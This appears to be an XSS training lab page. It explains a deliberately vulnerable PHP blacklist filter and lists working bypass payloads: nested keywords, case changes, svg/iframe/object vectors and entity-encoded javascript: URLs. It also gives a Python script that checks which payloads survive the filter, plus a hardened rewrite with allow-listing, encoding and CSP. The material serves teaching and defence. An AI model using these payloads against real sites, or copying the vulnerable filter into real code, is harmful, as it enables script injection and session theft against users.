Blacklist Filter XSS Lab

Test XSS with blacklist-based filtering on id and search parameters

Blacklist Filter Challenge

Lab Overview

This lab demonstrates a common vulnerability where parameters use blacklist filtering to block specific XSS payloads. The 'id' and 'search' parameters filter out specific words but may still be vulnerable to bypass techniques.

Blacklist Filtering: The id and search parameters pass through str_replace(), which removes the exact strings 'script', 'img', 'image' and 'onfocus'. str_replace() is case-sensitive, makes a single pass per word and never rescans its own output, and the result is echoed without any encoding.
Hidden Parameters: id and search are not shown in the main form. Use a parameter-discovery tool such as Arjun to find them, for example: arjun -u <target URL>
Parameter Security Levels:
  Secure: fname, lname - uses htmlspecialchars()
  Partially secure: id, search - uses blacklist filtering
  Common mistake: blacklist filtering can often be bypassed
  Context: the output context affects exploitability
Filtering Comparison:
Secure Parameters (fname, lname):
Input: <script>alert(1)</script>
Output: &lt;script&gt;alert(1)&lt;/script&gt;
Blacklist Filtered (id, search):
Input: <script>alert(1)</script>
Output: <>alert(1)</>
Bypass Attempt:
Input: <scrscriptipt>alert(1)</scrscriptipt>
Output: <script>alert(1)</script>
The filter removes specific words in one case-sensitive pass, so it can be bypassed by nesting a blocked word inside itself (the inner copy is removed and the two halves rejoin), by changing case, or by using tags and event handlers that are not on the list.
Overall Security Level: Medium Vulnerability

Objective: Discover the hidden id and search parameters and bypass the blacklist filtering to execute XSS payloads.

Backend Source Code
// Secure branch: output encoded for the HTML context (ENT_QUOTES also covers quoted attribute values).
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// Deliberately vulnerable branches: str_replace() removes each listed word in a single,
// case-sensitive pass and never rescans the result, which is then echoed unencoded.
elseif(isset($_GET["id"])){
    $arr = array('script','img','image','onfocus');
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
elseif(isset($_GET["search"])){
    $arr = array('script','img','image','onfocus');
    $re = str_replace($arr, '', $_GET['search']);
    echo $re;
}
Test Input Forms
Visible Parameters (HTML Encoded): fname, lname - both pass through htmlspecialchars()
Hidden Parameters (Blacklist Filtered): id, search - not shown in the main form but implemented in the backend; both pass through str_replace(), which removes 'script', 'img', 'image', 'onfocus'
XSS Bypass Techniques for Blacklist Filters
Keyword Nesting Bypass (the filter does one pass per word, so a blocked word hidden inside itself survives):
  • <scrscriptipt>alert(1)</scrscriptipt>  - the inner 'script' is removed and the halves rejoin
  • <imimgg src=x onerror=alert(1)>  - becomes <img src=x onerror=alert(1)>
  • <imimageage src=x onerror=alert(1)>  - becomes <image src=x onerror=alert(1)>, which the HTML parser treats as <img>
Alternative Tags/Events:
  • <svg onload=alert(1)>
  • <body onload=alert(1)>
  • <iframe src=javascrscriptipt:alert(1)>  - a plain javascript: URL contains 'script' and is cut down to java:, so the scheme itself must be nested (or entity-encoded, e.g. src=java&#115;cript:alert(1))
Case Variation Bypass (str_replace() is case-sensitive; str_ireplace() or lowercasing before filtering would block these):
  • <SCRIPT>alert(1)</SCRIPT>
  • <ScRiPt>alert(1)</ScRiPt>
  • <IMG src=x onerror=alert(1)>
Alternative Techniques (browser-dependent; verify in the target's browser):
  • <object data="java&#115;cript:alert(1)"></object>  - the character reference hides 'script' from the filter and the browser decodes the attribute; javascript: URLs in object/embed are not executed by most current browsers
  • <embed src="java&#115;cript:alert(1)"></embed>
  • <marquee onstart=alert(1)></marquee>  - onstart fires only in legacy Internet Explorer
Blacklist Filter Analysis:

The current filter removes these exact strings, case-sensitively and in one pass each: 'script', 'img', 'image', 'onfocus'

This means any of these techniques can bypass the filter:

  • Using alternative tags that aren't in the blacklist (svg, iframe, object, embed); any javascript: URL inside them still has to hide the word 'script', e.g. javascrscriptipt: or java&#115;cript:
  • Using alternative event handlers that aren't in the blacklist (onload, onerror, onmouseover)
  • Using case variations (ScRiPt, IMG), because str_replace() is case-sensitive
  • Nesting a blocked word inside itself (scrscriptipt), because the filter never rescans its output
  • Using HTML character references inside attribute values (src=java&#115;cript:alert(1)): the filter sees no blocked word and the browser decodes the attribute. Percent-encoding does not help here, because PHP decodes the query string before str_replace() runs, and character references cannot rebuild a blocked tag or attribute name outside an attribute value
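To check which of the payloads above actually survive this filter before sending them at a target, the following Python script models the PHP str_replace() call from the backend source (single pass per word, list order, case-sensitive, no rescan) and runs the page's payloads through it. This is an added example written for this page, not the lab's own code; the payload list and its "vector" strings are constructed here, and the helper names are assumptions.

```python
# Added example (not the lab's own code): an offline Python model of the PHP filter
#   str_replace(array('script','img','image','onfocus'), '', $value)
# so payloads can be checked before they are sent at a target. The payload list is
# constructed here from the ones discussed on this page plus a few controls.
from typing import Dict, Optional
from urllib.parse import unquote

BLACKLIST = ("script", "img", "image", "onfocus")


def blacklist_filter(value: str, words=BLACKLIST) -> str:
    """Model PHP str_replace() with an array of search strings.

    Each word is applied in list order, every occurrence is removed in one
    left-to-right pass, and the output is never rescanned. Matching is
    case-sensitive (str_ireplace() would not be). Those three properties
    are the whole bypass surface.
    """
    for w in words:
        value = value.replace(w, "")
    return value


def nest(word: str, split: Optional[int] = None) -> str:
    """Build a keyword-nesting payload for a single-pass filter.

    A full copy of `word` is placed inside a split copy of itself; removing the
    inner copy makes the halves close up: nest("script", 3) -> "scrscriptipt".
    """
    if split is None:
        split = len(word) // 2
    return word[:split] + word + word[split:]


def as_php_get(raw_query_value: str) -> str:
    """PHP percent-decodes query values before they reach $_GET, so the filter
    always sees the decoded form: %73cript arrives as 'script' and is removed."""
    return unquote(raw_query_value)


def survives(payload: str, vector: str) -> bool:
    """True when `vector`, the fragment the browser must still see for the
    payload to fire, is intact after decoding and filtering."""
    return vector in blacklist_filter(as_php_get(payload))


# payload -> the fragment that has to reach the browser for the payload to fire
CASES: Dict[str, str] = {
    "<script>alert(1)</script>": "<script>",                      # stripped to <>alert(1)</>
    "<scrscriptipt>alert(1)</scrscriptipt>": "<script>",          # inner copy removed, halves rejoin
    "<imimgg src=x onerror=alert(1)>": "<img ",
    "<imimageage src=x onerror=alert(1)>": "<image ",             # browsers parse <image> as <img>
    "<SCRIPT>alert(1)</SCRIPT>": "<SCRIPT>",                      # case-sensitive filter
    "<svg onload=alert(1)>": "<svg onload",                       # tag and handler not listed
    "<iframe src=javascript:alert(1)>": "src=javascript:",        # 'javascript' contains 'script'
    "<iframe src=javascrscriptipt:alert(1)>": "src=javascript:",  # nested scheme survives
    "<iframe src=java&#115;cript:alert(1)>": "src=java&#115;cript:",  # decoded by the browser only
    "<input autofocus onfocus=alert(1)>": "onfocus",              # handler is on the list
    "%3Cscript%3Ealert(1)%3C/script%3E": "<script>",              # decoded before filtering
}


def audit(cases: Dict[str, str] = CASES) -> Dict[str, bool]:
    """Run every case through the model and report which ones bypass the filter."""
    return {payload: survives(payload, vector) for payload, vector in cases.items()}


if __name__ == "__main__":
    for payload, ok in audit().items():
        label = "BYPASS " if ok else "blocked"
        print(f"{label}  {payload:45} -> {blacklist_filter(as_php_get(payload))}")
```

The model is only as good as its assumptions about the backend: if the real code used str_ireplace(), a loop that repeats until nothing changes, or preg_replace with a case-insensitive flag, the case and nesting rows would flip, which is exactly why the lab's source is worth reading before fuzzing.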
Security Implications

Blacklist filtering demonstrates:

  • Blacklists are inherently incomplete and can be bypassed
  • Attackers only need to find one unblocked vector
  • Case sensitivity issues in filtering implementations
  • New HTML tags and events are constantly being added
  • Whitelist approaches are more secure than blacklists
  • Context-aware encoding is more reliable than keyword filtering
Best Practices

For secure web applications:

  • Use whitelist validation instead of blacklists
  • Apply context-aware output encoding
  • Implement strict Content Security Policy (CSP) headers
  • Validate input based on expected data types
  • Use security libraries/frameworks for output encoding
  • Test with automated and manual security testing
  • Assume blacklists will be bypassed
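As an added example of the practices listed above, here is a hardened Python rendition of the backend's three branches: the id parameter is validated against an allow-list (digits only), fname, lname and search are output-encoded for their HTML context (the Python equivalent of htmlspecialchars with ENT_QUOTES), and every response carries a strict Content-Security-Policy. This is illustrative code written for this page, not the lab's own; the function names, the (status, headers, body) response shape and the CSP string are assumptions.

```python
# Added example (not the lab's own code): a hardened Python rendition of the three PHP
# branches shown in the backend source, applying the practices listed on this page:
# allow-list validation for id, context-aware output encoding for the text fields and
# search, and a strict CSP. Function names and the response shape are assumptions.
import html
import re
from typing import Dict, Tuple

# Strict policy: no inline script, no object/embed plugins, no <base> hijacking.
# The PHP equivalent would be header("Content-Security-Policy: ...").
SECURITY_HEADERS: Dict[str, str] = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
}


def parse_id(raw: str) -> int:
    """Allow-list validation: an id is an unsigned integer, nothing else.
    Rejecting everything that is not [0-9]+ leaves no room for markup at all
    (PHP: ctype_digit($raw) ? (int)$raw : reject)."""
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError("id must be a decimal integer")
    return int(raw)


def encode_for_html(value: str) -> str:
    """Context-aware encoding for HTML text and quoted attribute values
    (PHP: htmlspecialchars($value, ENT_QUOTES, 'UTF-8')). No blacklist:
    every character that can open markup is encoded, whatever word it spells."""
    return html.escape(value, quote=True)


def handle_request(params: Dict[str, str]) -> Tuple[int, Dict[str, str], str]:
    """Hardened counterpart of the lab's three branches.
    Returns (status, headers, body) so the result can be inspected without a server."""
    if "fname" in params and "lname" in params:
        body = "<p>" + encode_for_html(params["fname"]) + " " + encode_for_html(params["lname"]) + "</p>"
    elif "id" in params:
        try:
            record_id = parse_id(params["id"])
        except ValueError:
            return 400, SECURITY_HEADERS, "<p>Invalid id</p>"
        body = f"<p>Record {record_id}</p>"
    elif "search" in params:
        # Attribute context: the value is quoted AND encoded, so neither a stray
        # quote nor a new attribute (e.g. onfocus) can break out of the value.
        body = f'<input name="search" value="{encode_for_html(params["search"])}">'
    else:
        body = ""
    return 200, SECURITY_HEADERS, body


if __name__ == "__main__":
    for p in ({"search": "<scrscriptipt>alert(1)</scrscriptipt>"},
              {"search": '" autofocus onfocus="alert(1)'},
              {"id": "<svg onload=alert(1)>"},
              {"id": "42"}):
        print(handle_request(p))
```

Note that none of the nesting, case or entity tricks from the bypass list matter here: the encoder does not look for words, it neutralises the characters that give markup its meaning, and the CSP blocks inline script even if some other bug lets a tag through.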
Real-World Attack Scenarios
Common Blacklist Bypass Vectors:
  • Search forms: Search parameters often use blacklist filtering
  • ID parameters: Often overlooked in security implementations
  • Contact forms: Various fields may have inconsistent filtering
  • URL parameters: Often used for tracking with minimal validation
Impact of Blacklist Bypass:
  • Arbitrary script execution in users' browsers despite the filtering
  • Session hijacking through cookie theft
  • Account takeover attacks
  • Phishing attacks from within the application
  • Defacement of application content
Prevention Strategies:
  • Whitelist validation: Only allow known-safe characters/patterns
  • Output encoding: Always encode before output based on context
  • Content Security Policy: Implement strict CSP headers
  • Security testing: Test all parameters with bypass techniques